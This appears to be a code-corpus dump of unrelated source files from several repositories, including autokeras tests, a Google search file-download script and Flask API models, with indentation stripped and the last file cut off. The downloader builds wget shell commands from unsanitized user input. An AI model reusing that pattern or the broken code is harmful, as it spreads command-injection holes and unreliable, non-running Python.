print('\t[ %s ] %s' % (menu["id"], menu["description"]))
```
|
{
"source": "jeziellago/autokeras",
"score": 2
}
|
#### File: tests/nn/test_generator.py
```python
from autokeras.nn.generator import *
from autokeras.nn.graph import TorchModel
def test_default_generator():
generator = CnnGenerator(3, (28, 28, 1))
graph = generator.generate()
model = graph.produce_model()
assert isinstance(model, TorchModel)
```
#### File: tests/text/test_text_supervised.py
```python
from unittest.mock import patch
import pytest
from autokeras.text.text_supervised import *
from tests.common import clean_dir, MockProcess, simple_transform
def mock_train(**kwargs):
str(kwargs)
return 1, 0
def mock_text_preprocess(x_train, path="dummy_path"):
return x_train
@patch('torch.multiprocessing.Pool', new=MockProcess)
@patch('autokeras.text.text_supervised.text_preprocess', side_effect=mock_text_preprocess)
@patch('autokeras.search.ModelTrainer.train_model', side_effect=mock_train)
def test_fit_predict(_, _1):
Constant.MAX_ITER_NUM = 1
Constant.MAX_MODEL_NUM = 4
Constant.SEARCH_MAX_ITER = 1
Constant.T_MIN = 0.8
path = 'tests/resources/temp'
clean_dir(path)
clf = TextClassifier(path=path, verbose=True)
train_x = np.random.rand(100, 25, 25, 1)
train_y = np.random.randint(0, 5, 100)
clf.fit(train_x, train_y, )
results = clf.predict(train_x)
assert all(map(lambda result: result in train_y, results))
clean_dir(path)
@patch('torch.multiprocessing.Pool', new=MockProcess)
@patch('autokeras.text.text_supervised.text_preprocess', side_effect=mock_text_preprocess)
def test_timeout(_):
# Constant.MAX_MODEL_NUM = 4
Constant.SEARCH_MAX_ITER = 1000
Constant.T_MIN = 0.0001
Constant.DATA_AUGMENTATION = False
path = 'tests/resources/temp'
clean_dir(path)
clf = TextClassifier(path=path, verbose=False)
train_x = np.random.rand(100, 25, 25, 1)
train_y = np.random.randint(0, 5, 100)
with pytest.raises(TimeoutError):
clf.fit(train_x, train_y, time_limit=0)
clean_dir(path)
@patch('torch.multiprocessing.Pool', new=MockProcess)
@patch('autokeras.text.text_supervised.text_preprocess', side_effect=mock_text_preprocess)
@patch('autokeras.search.ModelTrainer.train_model', side_effect=mock_train)
def test_timeout_resume(_, _1):
Constant.MAX_ITER_NUM = 1
# make it impossible to complete within 10sec
Constant.MAX_MODEL_NUM = 1000
Constant.SEARCH_MAX_ITER = 1
Constant.T_MIN = 0.8
train_x = np.random.rand(100, 25, 25, 1)
train_y = np.random.randint(0, 5, 100)
test_x = np.random.rand(100, 25, 25, 1)
path = 'tests/resources/temp'
clean_dir(path)
clf = TextClassifier(path=path, verbose=False, resume=False)
clf.n_epochs = 100
clf.fit(train_x, train_y, time_limit=2)
history_len = len(clf.load_searcher().history)
assert history_len != 0
results = clf.predict(test_x)
assert len(results) == 100
clf = TextClassifier(path=path, verbose=False, resume=True)
assert len(clf.load_searcher().history) == history_len
Constant.MAX_MODEL_NUM = history_len + 1
clf.fit(train_x, train_y)
assert len(clf.load_searcher().history) == history_len + 1
results = clf.predict(test_x)
assert len(results) == 100
clean_dir(path)
@patch('torch.multiprocessing.Pool', new=MockProcess)
@patch('autokeras.bayesian.transform', side_effect=simple_transform)
@patch('autokeras.search.ModelTrainer.train_model', side_effect=mock_train)
@patch('autokeras.text.text_supervised.text_preprocess', side_effect=mock_text_preprocess)
def test_final_fit(_, _1, _2):
Constant.LIMIT_MEMORY = True
path = 'tests/resources/temp'
clean_dir(path)
clf = TextClassifier(path=path, verbose=False)
Constant.MAX_ITER_NUM = 1
Constant.MAX_MODEL_NUM = 1
Constant.SEARCH_MAX_ITER = 1
Constant.N_NEIGHBOURS = 1
Constant.T_MIN = 0.8
train_x = np.random.rand(100, 25, 25, 1)
train_y = np.random.randint(0, 5, 100)
test_x = np.random.rand(100, 25, 25, 1)
test_y = np.random.randint(0, 5, 100)
clf.fit(train_x, train_y)
clf.final_fit(train_x, train_y, test_x, test_y)
results = clf.predict(test_x)
assert len(results) == 100
clean_dir(path)
@patch('torch.multiprocessing.Pool', new=MockProcess)
@patch('autokeras.search.ModelTrainer.train_model', side_effect=mock_train)
@patch('autokeras.text.text_supervised.text_preprocess', side_effect=mock_text_preprocess)
def test_save_continue(_, _1):
Constant.MAX_ITER_NUM = 1
Constant.MAX_MODEL_NUM = 1
Constant.SEARCH_MAX_ITER = 1
Constant.T_MIN = 0.8
train_x = np.random.rand(100, 25, 25, 1)
train_y = np.random.randint(0, 5, 100)
test_x = np.random.rand(100, 25, 25, 1)
path = 'tests/resources/temp'
clean_dir(path)
clf = TextClassifier(path=path, verbose=False, resume=False)
clf.n_epochs = 100
clf.fit(train_x, train_y, time_limit=5)
assert len(clf.load_searcher().history) == 1
Constant.MAX_MODEL_NUM = 2
clf = TextClassifier(verbose=False, path=path, resume=True)
clf.fit(train_x, train_y)
results = clf.predict(test_x)
assert len(results) == 100
assert len(clf.load_searcher().history) == 2
Constant.MAX_MODEL_NUM = 1
clf = TextClassifier(verbose=False, path=path, resume=False)
clf.fit(train_x, train_y)
results = clf.predict(test_x)
assert len(results) == 100
assert len(clf.load_searcher().history) == 1
clean_dir(path)
@patch('autokeras.text.text_supervised.temp_folder_generator', return_value='dummy_path/')
def test_init_image_classifier_with_none_path(_):
clf = TextClassifier()
assert clf.path == 'dummy_path/'
@patch('torch.multiprocessing.Pool', new=MockProcess)
@patch('autokeras.search.ModelTrainer.train_model', side_effect=mock_train)
@patch('autokeras.text.text_supervised.text_preprocess', side_effect=mock_text_preprocess)
def test_evaluate(_, _1):
Constant.MAX_ITER_NUM = 1
Constant.MAX_MODEL_NUM = 1
Constant.SEARCH_MAX_ITER = 1
Constant.T_MIN = 0.8
train_x = np.random.rand(100, 25, 25, 1)
train_y = np.random.randint(0, 5, 100)
path = 'tests/resources/temp'
clean_dir(path)
clf = TextClassifier(path=path, verbose=False, resume=False)
clf.n_epochs = 100
clf.fit(train_x, train_y)
score = clf.evaluate(train_x, train_y)
assert score <= 1.0
```
|
{
"source": "jeziellago/GoogleFilesFinder",
"score": 3
}
|
#### File: jeziellago/GoogleFilesFinder/Google_Files_Finder.py
```python
import os
import googlesearch
""" --------------------------------------------------------------------------- """
def cut_string(text, limit):
i = 0
while i > -1:
s = str(text[i:(i+1)])
i = i + 1
if s == limit:
text = text[0:i-1]
i = -1
if i > len(text):
i = -1
return text
""" --------------------------------------------------------------------------- """
def listFilesFromResult(all_files, log):
print('\nListing files URLs:\n')
position = 1
for url in all_files:
url = cut_string(url,'&')
if url[1:4] == 'url':
url = url[7:len(url)]
print('-------> ['+str(position)+"] " + url)
log.append(url)
position += 1
print('\n')
return log
""" --------------------------------------------------------------------------- """
def saveResultsInFile(log_list):
save_results = input("\n\n>> Do you want to save the results to a file? [Y/n] ")
if save_results == '' or save_results == 'Y' or save_results == 'y':
path_file = input("\n>> Enter the filename to save: ")
if path_file != '':
f = open(path_file,'w')
n = 0
for log in log_list:
f.write("\n" + "[" + str(n) + "] "+ log)
n = n + 1
f.close()
print("\nFile " + path_file + " saved!\n\n")
""" --------------------------------------------------------------------------- """
def downloadFiles(log_list):
do_wget = input("\n>> Do you want download (with wget) all files? [Y/n] ")
if do_wget == '' or do_wget == 'Y' or do_wget == 'y':
dir_save = input("\n>> Enter dir for save the files: ")
if dir_save != "":
for log in log_list:
os.system("wget " + log + " -P " + dir_save)
else:
do_wget = input("\n>> Do you want download (with wget) any file? [Y/n] ")
if do_wget == '' or do_wget == 'Y' or do_wget == 'y':
url_position = input("\n>> Enter the url position for download or 0 for exit (Ex.: 1,2,3...): ")
while(int(url_position) > 0):
dir_save = input("\n>> Enter dir for save the file: ")
if dir_save != "":
os.system("wget " + log_list[int(url_position)] + " -P " + dir_save)
url_position = input("\n>> Enter the url position for download or 0 for exit (Ex.: 1,2,3...): ")
""" --------------------------------------------------------------------------- """
def printHeader():
os.system("clear")
print('================================================================')
print('/ /')
print('/ GOOGLE FILE FINDER /')
print('/ by <NAME> /')
print('================================================================')
""" --------------------------------------------------------------------------- """
def main():
try:
printHeader()
# Input user search
search = input("\n-> Enter a key word: ")
log = []
log.append("Key Word of File Search -> " + search + "\n\n")
search = search.replace(" ","+")
file_type = input("-> Enter the file type (Ex.: pdf, txt, docx): ")
amount_results = int(input("-> Enter the max amount of results (Max = 1000000): "))
# Start Search
print('\n\n[-] Searching files in google...')
search = googlesearch.search_google(search, amount_results, 1, file_type)
search.process()
all_files = search.get_files()
# Listing files from results
log = listFilesFromResult(all_files, log)
# Save Results
saveResultsInFile(log)
# Download files
downloadFiles(log)
print("\n\nFinish!\n")
except KeyboardInterrupt:
        print('\nFiles Finder closed. Thanks for using it.')
""" --------------------------------------------------------------------------- """
if __name__ == "__main__":
main()
```
|
{
"source": "jeziellago/list-android-large-files",
"score": 3
}
|
#### File: jeziellago/list-android-large-files/list_large_files.py
```python
import os
import sys
from argparse import ArgumentParser
files_count={}
def walk(ROOT):
if os.path.isfile(ROOT):
if "build" not in ROOT and (ROOT.endswith(".java") or ROOT.endswith(".kt")):
count = 1
for _ in open(ROOT, "r"):
count += 1
files_count[ROOT.split("/")[-1]] = count
else:
dirs = os.listdir(ROOT)
for d in dirs:
path = os.path.join(ROOT, d)
walk(path)
def print_results(limit, output_file, include_test):
sorted_files = sorted(files_count.items(), key=lambda x: x[1], reverse=True)
check_test_file = lambda filename: not "Test" in filename if not include_test else True
def print_line(position, count, filename, output_file=None):
if output_file: output_file.write("{},{},{}\n".format(position,count,filename))
else: print("[{}º]> {} lines - {}".format(position,count,filename))
csv_file = None
if output_file:
csv_file = open(output_file + ".csv", "w")
csv_file.write("Position,Lines,File\n")
index = 1
for fl in sorted_files:
if fl[1] >= limit and check_test_file(fl[0]):
print_line(index, fl[1],fl[0], csv_file)
index += 1
def main(args):
project = args.project
limit = args.limit
include_test = args.include_test
output_file = args.output
walk(project)
print_results(limit, output_file, include_test)
if __name__ == '__main__':
    parser = ArgumentParser(description="Show the largest files in an Android project")
parser.add_argument('--project', help='Project dir')
    parser.add_argument('--limit', type=int, help='Line count limit', default=300)
    parser.add_argument('--include_test', action='store_true', help='Include test files')
parser.add_argument('--output', help='File to save the results')
args = parser.parse_args()
main(args)
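# Example invocation (added; the paths are hypothetical):
#   python list_large_files.py --project ./MyApp --limit 400 --output report
# writes every .java/.kt file with at least 400 lines to report.csv
# (omit --output to print the list instead).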
```
|
{
"source": "jezifm/cognalys-api-python-client",
"score": 3
}
|
#### File: jezifm/cognalys-api-python-client/test_cognalys.py
```python
import string
import random
import unittest
import mock
import requests
import cognalys
def random_string(size=12, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def random_mobile():
random_digit = random.randint(0, 9999999)
return '+63921{random_digit:07d}'.format(random_digit=random_digit)
def url_from_requests_args(*args, **kwargs):
url_components = list(requests.compat.urlparse(args[0]))
url_components[4] = requests.compat.urlencode(kwargs['params'])
url = requests.compat.urlunparse(url_components)
return url
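# Added note (illustrative): this helper rebuilds the URL that requests would
# have hit, e.g. args ('http://api.test/otp',) with kwargs
# {'params': {'otp': '1234'}} becomes 'http://api.test/otp?otp=1234'.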
class MockTest(unittest.TestCase):
def setUp(self):
self.access_token = random_string()
self.app_id = random_string()
self.client = cognalys.OTPClient(self.access_token, self.app_id)
@mock.patch('cognalys.requests')
def test_can_send_missed_call(self, mrequests):
mobile = random_mobile()
response_missed_call = self.client.send_missed_call(mobile)
# get url
args, kwargs = mrequests.get.call_args
url = args[0]
self.assertIn(self.access_token, url)
self.assertIn(self.app_id, url)
self.assertIn(mobile, url)
@mock.patch('cognalys.requests')
def test_can_verify_number(self, mrequests):
keymatch = random_string()
otp_number = random_string()
response_verification = self.client.verify_number(keymatch, otp_number)
# get url
args, kwargs = mrequests.get.call_args
url = url_from_requests_args(*args, **kwargs)
self.assertIn(self.access_token, url)
self.assertIn(self.app_id, url)
self.assertIn(keymatch, url)
self.assertIn(otp_number, url)
```
|
{
"source": "jezlo/listWithWLST",
"score": 3
}
|
#### File: listWithWLST/Pruebas/testConex.py
```python
import json
def getDatosConex():
with open('config.json') as json_files:
data = json.load(json_files)
for p in data['conexion']:
            print('User: ' + p['usuario'])
print('Password: '+p['password'])
print('URL: '+p['url'])
getDatosConex()
```
|
{
"source": "jeznorth/mds",
"score": 2
}
|
#### File: expected/resources/expected_document_uploads.py
```python
import decimal
import uuid
import requests
import json
from datetime import datetime
from flask import request, current_app
from flask_restplus import Resource, reqparse
from werkzeug.datastructures import FileStorage
from werkzeug import exceptions
from sqlalchemy.exc import DBAPIError
from ..models.mine_expected_document import MineExpectedDocument
from ....mines.mine.models.mine import Mine
from ...expected.models.mine_expected_document import MineExpectedDocument
from ...expected.models.mine_expected_document_xref import MineExpectedDocumentXref
from ...mines.models.mine_document import MineDocument
from app.extensions import api, db
from ....utils.access_decorators import requires_any_of, MINE_CREATE, MINESPACE_PROPONENT
from ....utils.resources_mixins import UserMixin, ErrorMixin
class ExpectedDocumentUploadResource(Resource, UserMixin, ErrorMixin):
parser = reqparse.RequestParser()
@api.expect(parser)
@api.doc(
params={
'expected_document_guid':
'Required: The guid of the expected document that this upload will be satisfying.'
})
@requires_any_of([MINE_CREATE, MINESPACE_PROPONENT])
def post(self, expected_document_guid):
self.parser.add_argument('file', type=FileStorage, location='files', action='append')
self.parser.add_argument('mine_document_guid', type=str)
try:
data = self.parser.parse_args()
except exceptions.RequestEntityTooLarge:
return self.create_error_payload(
413,
                f'The maximum file upload size is {current_app.config["MAX_CONTENT_LENGTH"]/1024/1024}MB; please ensure no file exceeds this size.'
), 413
expected_document = MineExpectedDocument.find_by_exp_document_guid(expected_document_guid)
if not expected_document:
return self.create_error_payload(400, f'expected document not found'), 400
mine = Mine.find_by_mine_guid(str(expected_document.mine_guid))
document_category = expected_document.required_document.req_document_category.req_document_category
if data.get('mine_document_guid'):
existing_mine_doc = MineDocument.find_by_mine_document_guid(
data.get('mine_document_guid'))
if not existing_mine_doc:
return self.create_error_payload(400, 'mine_document not found'), 400
expected_document.mine_documents.append(existing_mine_doc)
db.session.commit()
result = expected_document.json()
else: #expecting a new file
if not data['file']:
return self.create_error_payload(
400, 'expecting mine_document_guid or new file, neither found'), 400
if document_category:
folder = 'mines/' + str(mine.mine_guid) + '/' + str(document_category)
pretty_folder = 'mines/' + str(mine.mine_no) + '/' + str(document_category)
else:
folder = 'mines/' + str(mine.mine_guid) + '/documents'
pretty_folder = 'mines/' + str(mine.mine_no) + '/documents'
document_manager_URL = current_app.config['DOCUMENT_MANAGER_URL'] + '/document-manager'
files = []
for file in data['file']:
files.append(('file', (file.filename, file, file.mimetype)))
args = {'folder': folder, 'pretty_folder': pretty_folder}
headers = {'Authorization': request.headers.get('Authorization')}
response = requests.post(
url=document_manager_URL, data=args, files=files, headers=headers)
json_response = response.json()
errors = json_response['errors']
document_guids = json_response['document_manager_guids']
filenames = []
try:
for key, value in document_guids.items():
doc = MineDocument(
mine_guid=expected_document.mine_guid,
document_manager_guid=key,
document_name=value,
**self.get_create_update_dict())
expected_document.mine_documents.append(doc)
db.session.add(expected_document)
filenames.append(value)
db.session.commit()
except DBAPIError:
#log the error here and return a pretty error message
db.session.rollback()
return self.create_error_payload(500, 'An unexpected error occured')
result = {'status': 200, 'errors': errors, 'files': filenames}
return result
@requires_any_of([MINE_CREATE, MINESPACE_PROPONENT])
def delete(self, expected_document_guid=None, mine_document_guid=None):
if expected_document_guid is None or mine_document_guid is None:
return self.create_error_payload(
400, 'Must provide a expected document guid and a mine document guid.'), 400
expected_document = MineExpectedDocument.find_by_exp_document_guid(expected_document_guid)
mine_document = MineDocument.find_by_mine_document_guid(mine_document_guid)
if expected_document is None or mine_document is None:
return self.create_error_payload(
400,
f'Failed to remove the document either the expected document or the mine document was not found.'
), 400
expected_document.mine_documents.remove(mine_document)
expected_document.save()
        return {'status': 200, 'message': 'The document was removed successfully.'}
```
#### File: required/models/required_document_categories.py
```python
from datetime import datetime
import uuid
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.schema import FetchedValue
from sqlalchemy.orm import validates
from app.extensions import db
from ....utils.models_mixins import AuditMixin, Base
#comment to force commit
class RequiredDocumentCategory(Base):
__tablename__ = 'mds_required_document_category'
req_document_category_guid = db.Column(UUID(as_uuid=True), primary_key=True, server_default=FetchedValue())
req_document_category = db.Column(db.String(60))
def json(self):
return {
'req_document_category_guid': str(self.req_document_category_guid),
'req_document_category': str(self.req_document_category),
}
```
#### File: api/nris_services/NRIS_service.py
```python
import decimal
import uuid
import requests
import json
import functools
from dateutil.relativedelta import relativedelta
from datetime import datetime
from flask import request, current_app
from flask_restplus import Resource, reqparse
from werkzeug.datastructures import FileStorage
from werkzeug import exceptions
from sqlalchemy.exc import DBAPIError
from app.extensions import cache
from ..constants import NRIS_CACHE_PREFIX, TIMEOUT_24_HOURS, TIMEOUT_12_HOURS
def _get_datetime_from_NRIS_data(date):
return datetime.strptime(date, '%Y-%m-%d %H:%M')
def _get_NRIS_token():
result = cache.get(NRIS_CACHE_PREFIX + 'token')
if result is None:
params = {
'disableDeveloperFilter': 'true',
'grant_type': 'client_credentials',
'scope': 'NRISWS.*'
}
url = current_app.config['NRIS_TOKEN_URL']
if url is None:
raise TypeError('Could not load the NRIS URL.')
else:
resp = requests.get(
url=url,
params=params,
auth=(current_app.config['NRIS_USER_NAME'], current_app.config['NRIS_PASS']))
try:
resp.raise_for_status()
except:
raise
result = resp.json().get('access_token')
cache.set(NRIS_CACHE_PREFIX + 'token', result, timeout=TIMEOUT_12_HOURS)
return result
def _get_EMPR_data_from_NRIS(mine_no):
current_date = datetime.now()
try:
token = _get_NRIS_token()
except:
raise
if token is None:
return None
url = current_app.config['NRIS_INSPECTION_URL']
if url is None:
raise TypeError('Could not load the NRIS URL.')
else:
        # Inspection start date is set to 2018-01-01 as that is the beginning of time for NRIS
params = {
'inspectionStartDate': '2018-01-01',
'inspectionEndDate': f'{current_date.year}-{current_date.month}-{current_date.day}',
'mineNumber': mine_no,
}
headers = {'Authorization': 'Bearer ' + token}
try:
empr_nris_resp = requests.get(
url=current_app.config['NRIS_INSPECTION_URL'], params=params, headers=headers)
except requests.exceptions.Timeout:
raise
try:
empr_nris_resp.raise_for_status()
except requests.exceptions.HTTPError:
#TODO add logging for this error.
raise
return empr_nris_resp.json()
def _process_NRIS_data(data, mine_no):
data = sorted(
data,
key=lambda k: datetime.strptime(k.get('assessmentDate'), '%Y-%m-%d %H:%M'),
reverse=True)
most_recent = data[0]
advisories = 0
warnings = 0
num_open_orders = 0
num_overdue_orders = 0
section_35_orders = 0
open_orders_list = []
for report in data:
report_date = _get_datetime_from_NRIS_data(report.get('assessmentDate'))
one_year_ago = datetime.now() - relativedelta(years=1)
prefix, inspector = report.get('assessor').split('\\')
inspection = report.get('inspection')
stops = inspection.get('stops')
order_count = 1
for stop in stops:
stop_orders = stop.get('stopOrders')
stop_advisories = stop.get('stopAdvisories')
stop_warnings = stop.get('stopWarnings')
for order in stop_orders:
if order.get('orderStatus') == 'Open':
legislation = order.get('orderLegislations')
permit = order.get('orderPermits')
section = None
if legislation:
section = legislation[0].get('section')
elif permit:
section = permit[0].get('permitSectionNumber')
order_to_add = {
'order_no': f'{report.get("assessmentId")}-{order_count}',
'violation': section,
'report_no': report.get('assessmentId'),
'inspector': inspector,
'due_date': order.get('orderCompletionDate'),
'overdue': False,
}
num_open_orders += 1
if order.get(
'orderCompletionDate') is not None and _get_datetime_from_NRIS_data(
order.get('orderCompletionDate')) < datetime.now():
num_overdue_orders += 1
order_to_add['overdue'] = True
open_orders_list.append(order_to_add)
order_count += 1
if order.get('orderAuthoritySection') == 'Section 35':
section_35_orders += 1
if one_year_ago < report_date:
advisories += len(stop_advisories)
warnings += len(stop_warnings)
overview = {
'last_inspection': most_recent.get('assessmentDate'),
'inspector': inspector,
'num_open_orders': num_open_orders,
'num_overdue_orders': num_overdue_orders,
'advisories': advisories,
'warnings': warnings,
'section_35_orders': section_35_orders,
'open_orders': open_orders_list,
}
cache.set(NRIS_CACHE_PREFIX + mine_no, overview, timeout=TIMEOUT_24_HOURS)
return overview
```
#### File: party_appt/resources/test_mpa_permittee_resource.py
```python
from datetime import datetime
import json
from tests.constants import TEST_PERMITTEE_GUID, TEST_MINE_GUID, TEST_PERMIT_GUID_1, TEST_PARTY_PER_GUID_3
NON_EXISTENT_GUID = '8ef23184-02c4-4472-a912-380b5a0d9cae'
# GET
def test_get_permittee_not_found(test_client, auth_headers):
get_resp = test_client.get(
'/parties/mines/' + NON_EXISTENT_GUID, headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 404, str(get_resp.response)
get_data = json.loads(get_resp.data.decode())
assert get_data['error']['message']
def test_get_permittee(test_client, auth_headers):
get_resp = test_client.get(
'/parties/mines/' + TEST_PERMITTEE_GUID, headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, str(get_resp.response)
get_data = json.loads(get_resp.data.decode())
assert get_data['mine_party_appt_guid'] == TEST_PERMITTEE_GUID
assert get_data['mine_party_appt_type_code'] == 'PMT'
# POST
def test_post_permittee_unexpected_id_in_url(test_client, auth_headers):
post_resp = test_client.post('/parties/unexpected_id', headers=auth_headers['full_auth_header'])
assert post_resp.status_code == 400, str(post_resp.response)
post_data = json.loads(post_resp.data.decode())
assert post_data['error']['message']
def test_post_permittee_no_party(test_client, auth_headers):
data = {
'mine_party_appt_guid': TEST_PERMITTEE_GUID,
'permit_guid': TEST_PERMIT_GUID_1,
'mine_party_appt_type_code': 'PMT',
'effective_date': datetime.today().strftime("%Y-%m-%d")
}
post_resp = test_client.post(
'/parties/mines', data=data, headers=auth_headers['full_auth_header'])
assert post_resp.status_code == 400, str(post_resp.response)
post_data = json.loads(post_resp.data.decode())
assert post_data['error']['message']
def test_post_permittee_no_permit(test_client, auth_headers):
data = {
'party_guid': TEST_PARTY_PER_GUID_3,
'mine_party_appt_type_code': 'PMT',
'mine_party_appt_guid': TEST_PERMITTEE_GUID,
'effective_date': datetime.today().strftime("%Y-%m-%d")
}
post_resp = test_client.post(
'/parties/mines', data=data, headers=auth_headers['full_auth_header'])
post_data = json.loads(post_resp.data.decode())
assert post_resp.status_code == 400, str(post_resp.response)
assert post_data['error']['message']
def test_post_permittee_no_permittee(test_client, auth_headers):
data = {
'party_guid': TEST_PARTY_PER_GUID_3,
'permit_guid': TEST_PERMIT_GUID_1,
'mine_party_appt_type_code': 'PMT',
'effective_date': datetime.today().strftime("%Y-%m-%d")
}
post_resp = test_client.post(
'/parties/mines', data=data, headers=auth_headers['full_auth_header'])
assert post_resp.status_code == 400, str(post_resp.response)
post_data = json.loads(post_resp.data.decode())
assert post_data['error']['message']
def test_post_permittee_no_permittee_no_effective_date(test_client, auth_headers):
data = {
'party_guid': TEST_PARTY_PER_GUID_3,
'mine_party_appt_guid': TEST_PERMITTEE_GUID,
'mine_party_appt_type_code': 'PMT',
'related_guid': TEST_PERMIT_GUID_1,
}
post_resp = test_client.post(
'/parties/mines', data=data, headers=auth_headers['full_auth_header'])
assert post_resp.status_code == 400, str(post_resp.response)
post_data = json.loads(post_resp.data.decode())
assert post_data['error']['message']
def test_post_permittee(test_client, auth_headers):
data = {
'mine_guid': TEST_MINE_GUID,
'party_guid': TEST_PARTY_PER_GUID_3,
'mine_party_appt_type_code': 'PMT',
'mine_party_appt_guid': TEST_PERMITTEE_GUID,
'related_guid': TEST_PERMIT_GUID_1,
'effective_date': datetime.today().strftime("%Y-%m-%d")
}
post_resp = test_client.post(
'/parties/mines', data=data, headers=auth_headers['full_auth_header'])
assert post_resp.status_code == 200, str(post_resp.response)
post_data = json.loads(post_resp.data.decode())
assert post_data['party_guid'] == TEST_PARTY_PER_GUID_3
def test_post_permittee_permit_guid_not_found(test_client, auth_headers):
data = {
'party_guid': TEST_PARTY_PER_GUID_3,
'permit_guid': TEST_MINE_GUID,
'mine_party_appt_guid': TEST_PERMITTEE_GUID,
'effective_date': datetime.today().strftime("%Y-%m-%d")
}
post_resp = test_client.post(
'/parties/mines', data=data, headers=auth_headers['full_auth_header'])
assert post_resp.status_code == 400, str(post_resp.response)
post_data = json.loads(post_resp.data.decode())
assert post_data['error']['message']
def test_post_permittee_party_guid_not_found(test_client, auth_headers):
data = {
'party_guid': TEST_MINE_GUID,
'mine_party_appt_guid': TEST_PERMITTEE_GUID,
'related_guid': TEST_PERMIT_GUID_1,
'effective_date': datetime.today().strftime("%Y-%m-%d")
}
post_resp = test_client.post(
'/parties/mines', data=data, headers=auth_headers['full_auth_header'])
assert post_resp.status_code == 400, str(post_resp.response)
post_data = json.loads(post_resp.data.decode())
assert post_data['error']['message']
def test_put_permittee_permittee_guid_not_found(test_client, auth_headers):
data = {
'party_guid': TEST_PARTY_PER_GUID_3,
'related_guid': TEST_PERMIT_GUID_1,
'effective_date': datetime.today().strftime("%Y-%m-%d")
}
put_resp = test_client.put(
'/parties/' + NON_EXISTENT_GUID, data=data, headers=auth_headers['full_auth_header'])
assert put_resp.status_code == 404, str(put_resp.response)
put_data = json.loads(put_resp.data.decode())
assert put_data['error']['message']
```
|
{
"source": "jeznorth/sbc-auth",
"score": 2
}
|
#### File: auth_api/models/user.py
```python
import datetime
from flask import current_app
from sqlalchemy import Boolean, Column, ForeignKey, Integer, String, or_
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.orm import relationship
from auth_api.utils.roles import Status, UserStatus
from .base_model import BaseModel
from .db import db
from .membership import Membership as MembershipModel
from .org import Org as OrgModel
from .user_status_code import UserStatusCode
class User(BaseModel):
"""This is the model for a User."""
__tablename__ = 'user'
id = Column(Integer, primary_key=True)
username = Column('username', String(100), index=True)
firstname = Column('first_name', String(200), index=True)
lastname = Column('last_name', String(200), index=True)
email = Column('email', String(200), index=True)
keycloak_guid = Column(
'keycloak_guid', UUID(as_uuid=True), unique=True, nullable=False
)
roles = Column('roles', String(1000))
contacts = relationship('ContactLink', back_populates='user', primaryjoin='User.id == ContactLink.user_id')
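    # Note: the primaryjoin string below restricts loaded memberships to the ACTIVE and
    # PENDING_APPROVAL status codes; other membership statuses are not loaded on this relationship.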
orgs = relationship('Membership', back_populates='user',
primaryjoin='and_(User.id == Membership.user_id, \
or_(Membership.status == ' + str(Status.ACTIVE.value) + ', Membership.status == ' + str(
Status.PENDING_APPROVAL.value) + '))') # noqa:E127
is_terms_of_use_accepted = Column(Boolean(), default=False, nullable=True)
terms_of_use_accepted_version = Column(
ForeignKey('documents.version_id'), nullable=True
)
terms_of_use_version = relationship('Documents', foreign_keys=[terms_of_use_accepted_version], uselist=False,
lazy='select')
status = Column(
ForeignKey('user_status_code.id')
)
user_status = relationship('UserStatusCode', foreign_keys=[status], lazy='subquery')
@classmethod
def find_by_username(cls, username):
"""Return the first user with the provided username."""
return cls.query.filter_by(username=username).first()
@classmethod
def find_by_jwt_token(cls, token: dict):
"""Find an existing user by the keycloak GUID in the provided token."""
return cls.query.filter_by(
keycloak_guid=token.get('sub', None)
).one_or_none()
@classmethod
def create_from_jwt_token(cls, token: dict):
"""Create a User from the provided JWT."""
if token:
user = User(
username=token.get('preferred_username', None),
firstname=token.get('firstname', None),
lastname=token.get('lastname', None),
email=token.get('email', None),
keycloak_guid=token.get('sub', None),
created=datetime.datetime.now(),
roles=token.get('roles', None)
)
current_app.logger.debug(
'Creating user from JWT:{}; User:{}'.format(token, user)
)
user.status = UserStatusCode.get_default_type()
user.save()
return user
return None
@classmethod
def update_from_jwt_token(cls, token: dict, user):
"""Update a User from the provided JWT."""
if token:
if user:
user.username = token.get('preferred_username', user.username)
user.firstname = token.get('firstname', user.firstname)
user.lastname = token.get('lastname', user.lastname)
user.email = token.get('email', user.email)
user.modified = datetime.datetime.now()
user.roles = token.get('roles', user.roles)
current_app.logger.debug(
'Updating user from JWT:{}; User:{}'.format(token, user)
)
# If this user is marked as Inactive, this login will re-activate them
user.status = UserStatus.ACTIVE.value
cls.commit()
return user
return None
@classmethod
def find_users(cls, first_name, last_name, email):
"""Return a set of users with either the given username or the given email."""
# TODO: This needs to be improved for scalability. Paging large datasets etc.
if first_name == '' and last_name == '' and email == '':
return cls.query.all()
return cls.query.filter(or_(cls.firstname == first_name, cls.lastname == last_name, cls.email == email)).all()
@classmethod
def update_terms_of_use(cls, token: dict, is_terms_accepted, terms_of_use_version):
"""Update the terms of service for the user."""
if token:
user = cls.find_by_jwt_token(token)
user.is_terms_of_use_accepted = is_terms_accepted
user.terms_of_use_accepted_version = terms_of_use_version
current_app.logger.debug(
'Updating users Terms of use is_terms_accepted:{}; terms_of_use_version:{}'.format(
is_terms_accepted, terms_of_use_version)
)
cls.commit()
return user
return None
@classmethod
def find_users_by_org_id_by_status_by_roles(cls, org_id, roles, status=Status.ACTIVE.value):
"""Find all members of the org with a status."""
return db.session.query(User). \
join(MembershipModel,
(User.id == MembershipModel.user_id) & (MembershipModel.status == status) &
(MembershipModel.membership_type_code.in_(roles))). \
join(OrgModel).filter(OrgModel.id == org_id).all()
def delete(self):
"""Users cannot be deleted so intercept the ORM by just returning."""
return self
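# Usage sketch (illustrative only; assumes a Flask app context and Keycloak-style JWT claims):
#   token = {'preferred_username': 'jdoe', 'email': 'jdoe@example.com',
#            'sub': '11111111-2222-3333-4444-555555555555', 'roles': 'basic'}
#   user = User.find_by_jwt_token(token) or User.create_from_jwt_token(token)
#   user = User.update_from_jwt_token(token, user)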
```
|
{
"source": "jeznorth/sbc-pay",
"score": 2
}
|
#### File: jobs/update-stale-payment/update_stale_payment_records.py
```python
import datetime
import os
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
from flask import Flask
from flask_jwt_oidc import JwtManager
from pay_api.exceptions import BusinessException
from pay_api.models import PaymentTransaction as PaymentTransactionModel
from pay_api.models import Payment as PaymentModel
from pay_api.models import db, ma
from pay_api.services import TransactionService
from pay_api.services import PaymentService
from utils.logging import setup_logging
import config
